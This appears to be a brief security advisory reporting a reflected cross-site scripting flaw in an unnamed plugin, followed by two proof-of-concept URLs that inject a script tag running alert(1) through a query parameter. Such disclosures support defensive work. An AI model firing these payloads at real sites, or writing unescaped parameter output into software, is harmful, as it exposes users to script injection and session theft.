The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting
https://example.com/top-user-rated-listings?listview=2&q;"><script>alert(1)<%2Fscript>=1 https://example.com/advanced-search/search-results?pg=2&order;=featured&query;=all&format;=raw&m;"><script>alert(1)<%2Fscript>=1